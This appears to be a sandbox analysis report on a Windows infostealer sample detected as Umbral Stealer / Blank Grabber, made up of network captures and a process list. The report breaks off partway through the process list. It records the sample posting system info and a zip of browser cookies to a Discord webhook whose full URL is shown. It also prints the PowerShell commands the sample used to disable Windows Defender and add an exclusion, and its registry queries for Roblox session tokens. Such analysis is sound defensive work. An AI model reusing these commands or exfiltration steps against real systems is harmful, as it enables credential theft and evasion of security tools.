Aug 5, 2024 15:44:50.632515907 CEST  443          49740      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:50.703192949 CEST  443          49740      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:50.709532976 CEST  49740        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:50.709573030 CEST  443          49740      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:50.851871014 CEST  443          49740      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:50.852569103 CEST  443          49740      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:50.852655888 CEST  49740        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:50.859075069 CEST  49740        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:50.861491919 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:50.861543894 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:50.861649036 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:50.862303019 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:50.862322092 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.321618080 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.323159933 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.323201895 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.440784931 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.441258907 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.441289902 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.441353083 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.441359997 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.441423893 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.441441059 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.441526890 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.441546917 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.441657066 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.441678047 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.441781044 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.441796064 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.441809893 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.441814899 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.441876888 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.441899061 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.441901922 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.441909075 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.441914082 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.441921949 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.441926956 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.441934109 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.441965103 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.441972971 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.441989899 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442007065 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442028999 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442040920 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442053080 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442061901 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442068100 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442071915 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442090988 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442101002 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442117929 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442125082 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442156076 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442162991 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442178965 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442188025 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442194939 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442198992 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442222118 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442228079 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442234039 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442239046 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442251921 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442257881 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442291975 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442301035 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442316055 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442322016 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442353010 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442361116 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442367077 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442372084 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442384005 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442388058 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442424059 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442430019 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442446947 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442452908 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442457914 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442461967 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442480087 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442485094 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442502022 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442509890 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442516088 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442519903 CEST  443          49741      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:51.442549944 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442585945 CEST  49741        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:51.442596912 CEST  49741        443        192.168.2.4      162.159.138.232
                                                Aug 5, 2024 15:44:51.442615032 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442646980 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442682981 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442718029 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442759037 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442796946 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442838907 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.451961040 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.452297926 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.452332020 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.452358007 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.456990957 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.457075119 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.462876081 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:52.055568933 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:52.055663109 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:52.055730104 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:52.056494951 CEST49741443192.168.2.4162.159.138.232
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Aug 5, 2024 15:43:49.049926996 CEST | 61938 | 53 | 192.168.2.4 | 1.1.1.1 |
| Aug 5, 2024 15:43:49.058039904 CEST | 53 | 61938 | 1.1.1.1 | 192.168.2.4 |
| Aug 5, 2024 15:44:26.739140034 CEST | 58032 | 53 | 192.168.2.4 | 1.1.1.1 |
| Aug 5, 2024 15:44:26.747137070 CEST | 53 | 58032 | 1.1.1.1 | 192.168.2.4 |
| Aug 5, 2024 15:44:50.092690945 CEST | 64680 | 53 | 192.168.2.4 | 1.1.1.1 |
| Aug 5, 2024 15:44:50.101758957 CEST | 53 | 64680 | 1.1.1.1 | 192.168.2.4 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Aug 5, 2024 15:43:49.049926996 CEST | 192.168.2.4 | 1.1.1.1 | 0x31b8 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false |
| Aug 5, 2024 15:44:26.739140034 CEST | 192.168.2.4 | 1.1.1.1 | 0x43e6 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false |
| Aug 5, 2024 15:44:50.092690945 CEST | 192.168.2.4 | 1.1.1.1 | 0x63fd | Standard query (0) | ptb.discord.com | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Aug 5, 2024 15:43:49.058039904 CEST | 1.1.1.1 | 192.168.2.4 | 0x31b8 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false |
| Aug 5, 2024 15:44:26.747137070 CEST | 1.1.1.1 | 192.168.2.4 | 0x43e6 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false |
| Aug 5, 2024 15:44:50.101758957 CEST | 1.1.1.1 | 192.168.2.4 | 0x63fd | No error (0) | ptb.discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false |
| Aug 5, 2024 15:44:50.101758957 CEST | 1.1.1.1 | 192.168.2.4 | 0x63fd | No error (0) | ptb.discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false |
| Aug 5, 2024 15:44:50.101758957 CEST | 1.1.1.1 | 192.168.2.4 | 0x63fd | No error (0) | ptb.discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false |
| Aug 5, 2024 15:44:50.101758957 CEST | 1.1.1.1 | 192.168.2.4 | 0x63fd | No error (0) | ptb.discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false |
| Aug 5, 2024 15:44:50.101758957 CEST | 1.1.1.1 | 192.168.2.4 | 0x63fd | No error (0) | ptb.discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false |
                                                • ptb.discord.com
                                                • ip-api.com
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49731 | 208.95.112.1 | 80 | 7396 | C:\Users\user\Desktop\zamPeEkHWr.exe |

Aug 5, 2024 15:43:49.065330029 CEST, 80 bytes, OUT:
GET /line/?fields=hosting HTTP/1.1
                                                Host: ip-api.com
                                                Connection: Keep-Alive

Aug 5, 2024 15:43:49.522703886 CEST, 175 bytes, IN:
HTTP/1.1 200 OK
                                                Date: Mon, 05 Aug 2024 13:43:48 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Content-Length: 6
                                                Access-Control-Allow-Origin: *
                                                X-Ttl: 60
                                                X-Rl: 44
                                                Data Raw: 66 61 6c 73 65 0a
                                                Data Ascii: false


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.4 | 49738 | 208.95.112.1 | 80 | 7396 | C:\Users\user\Desktop\zamPeEkHWr.exe |

Aug 5, 2024 15:44:26.756620884 CEST, 55 bytes, OUT:
GET /json/?fields=225545 HTTP/1.1
                                                Host: ip-api.com

Aug 5, 2024 15:44:27.241185904 CEST, 379 bytes, IN:
HTTP/1.1 200 OK
                                                Date: Mon, 05 Aug 2024 13:44:26 GMT
                                                Content-Type: application/json; charset=utf-8
                                                Content-Length: 202
                                                Access-Control-Allow-Origin: *
                                                X-Ttl: 22
                                                X-Rl: 43
                                                Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49740 | 162.159.138.232 | 443 | 7396 | C:\Users\user\Desktop\zamPeEkHWr.exe |

2024-08-05 13:44:50 UTC, 364 bytes, OUT:
POST /api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL HTTP/1.1
                                                Accept: application/json
                                                User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                Content-Type: application/json; charset=utf-8
                                                Host: ptb.discord.com
                                                Content-Length: 940
                                                Expect: 100-continue
                                                Connection: Keep-Alive

2024-08-05 13:44:50 UTC, 25 bytes, IN:
HTTP/1.1 100 Continue

2024-08-05 13:44:50 UTC, 940 bytes, OUT:
Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 609290\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 71434D56-1548-ED3D-AEE6-C75AECD93BF0\r\nCPU: In

2024-08-05 13:44:50 UTC, 1369 bytes, IN:
HTTP/1.1 404 Not Found
                                                Date: Mon, 05 Aug 2024 13:44:50 GMT
                                                Content-Type: application/json
                                                Content-Length: 45
                                                Connection: close
                                                set-cookie: __dcfduid=e33ff842533011efbe60b67178f48d0e; Expires=Sat, 04-Aug-2029 13:44:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                x-ratelimit-limit: 5
                                                x-ratelimit-remaining: 4
                                                x-ratelimit-reset: 1722865492
                                                x-ratelimit-reset-after: 1
                                                via: 1.1 google
                                                alt-svc: h3=":443"; ma=86400
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2BBBAmd1RrIzFLhMO%2FwUWja0FGraiAvZGXlrwzS2KQ53MD0Lgp4EP3CjS%2FtWQOs%2FYbSjtsPUYOKa07FSNWu1ss1eQYbjL5UQLrbSzehFLb%2FnfOo09q2D2J42vggM0O9VNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                X-Content-Type-Options: nosniff
                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                Set-Cookie: __sdcfduid=e33ff842533011efbe60b67178f48d0ebfbd2fc0e724b666922ca10fb71189111e3b4659a738b6f2d176e07ba6c3b9c8; Expires=Sat, 04-Aug-2029 13:44:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                Set-Cookie: __cfruid=2cb54a56125b2ec73133bde1a3ab9d05c16a5180-1722865490; path=/; domain=.discord.com; HttpOnly; Secure; Sam

2024-08-05 13:44:50 UTC, 268 bytes, IN:
Data Ascii: eSite=NoneSet-Cookie: _cfuvid=ufKBB5AFxIYu_6WJ3.Y0A4iaZ_m0CODecm7xj1B3T7E-1722865490805-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ae739649b0241e1-EWR{"message": "Unknown Webhook", "


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.4 | 49741 | 162.159.138.232 | 443 | 7396 | C:\Users\user\Desktop\zamPeEkHWr.exe |

2024-08-05 13:44:51 UTC, 688 bytes, OUT:
POST /api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL HTTP/1.1
                                                Accept: application/json
                                                User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                Content-Type: multipart/form-data; boundary="dbf26cc2-51f7-478a-9bff-d23fc4e12861"
                                                Host: ptb.discord.com
                                                Cookie: __dcfduid=e33ff842533011efbe60b67178f48d0e; __sdcfduid=e33ff842533011efbe60b67178f48d0ebfbd2fc0e724b666922ca10fb71189111e3b4659a738b6f2d176e07ba6c3b9c8; __cfruid=2cb54a56125b2ec73133bde1a3ab9d05c16a5180-1722865490; _cfuvid=ufKBB5AFxIYu_6WJ3.Y0A4iaZ_m0CODecm7xj1B3T7E-1722865490805-0.0.1.1-604800000
                                                Content-Length: 654379
                                                Expect: 100-continue

2024-08-05 13:44:51 UTC, 25 bytes, IN:
HTTP/1.1 100 Continue

2024-08-05 13:44:51 UTC, 40 bytes, OUT:
Data Ascii: --dbf26cc2-51f7-478a-9bff-d23fc4e12861

2024-08-05 13:44:51 UTC, 140 bytes, OUT:
Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Umbral-609290.zip; filename*=utf-8''Umbral-609290.zip

2024-08-05 13:44:51 UTC, 16355 bytes, OUT:
Data Ascii: PKMY{#Browsers\Cookies\Chrome Cookies.txtWK])#nE/xm~oZ<5o3$Rn,:u9_}=sb{ $@HBn29x<Sw]E'E3[,d'.iP,t6_Xw2n>Y+sgKqnl

2024-08-05 13:44:52 UTC, 967 bytes, IN:
HTTP/1.1 404 Not Found
                                                Date: Mon, 05 Aug 2024 13:44:52 GMT
                                                Content-Type: application/json
                                                Content-Length: 45
                                                Connection: close
                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                x-ratelimit-limit: 5
                                                x-ratelimit-remaining: 4
                                                x-ratelimit-reset: 1722865493
                                                x-ratelimit-reset-after: 1
                                                via: 1.1 google
                                                alt-svc: h3=":443"; ma=86400
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RNW9pdtjvblLioLWZUfboMySiwBFgHK6dpv%2FHooofDFjLL8AKn2Af75Xn3f%2BjAbBvlW98v7%2FLlnH228kDCKSOr3cAjA%2B6wckKePXKI49EnuBYKvG4GsWJbunFkGQ6o40EQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                X-Content-Type-Options: nosniff
                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                Server: cloudflare
                                                CF-RAY: 8ae739693891c470-EWR
                                                {"message": "Unknown Webhook", "code": 10015}


                                                Target ID:0
                                                Start time:09:43:45
                                                Start date:05/08/2024
                                                Path:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\zamPeEkHWr.exe"
                                                Imagebase:0x1eaae570000
                                                File size:232'448 bytes
                                                MD5 hash:EF323A7483653FFB1FC4FF036576E065
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2336242686.000001EAB06A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:1
                                                Start time:09:43:47
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:"wmic.exe" csproduct get uuid
                                                Imagebase:0x7ff6f1fe0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:2
                                                Start time:09:43:47
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:09:43:48
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\attrib.exe
                                                Wow64 process (32bit):false
                                                Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\zamPeEkHWr.exe"
                                                Imagebase:0x7ff65a860000
                                                File size:23'040 bytes
                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:4
                                                Start time:09:43:48
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:09:43:48
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe'
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:09:43:48
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:09:43:51
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                Imagebase:0x7ff693ab0000
                                                File size:496'640 bytes
                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:09:43:55
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:09:43:55
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:09:43:58
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:11
                                                Start time:09:43:58
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:15
                                                Start time:09:44:09
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:16
                                                Start time:09:44:09
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:17
                                                Start time:09:44:26
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:"wmic.exe" os get Caption
                                                Imagebase:0x7ff6f1fe0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:18
                                                Start time:09:44:26
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
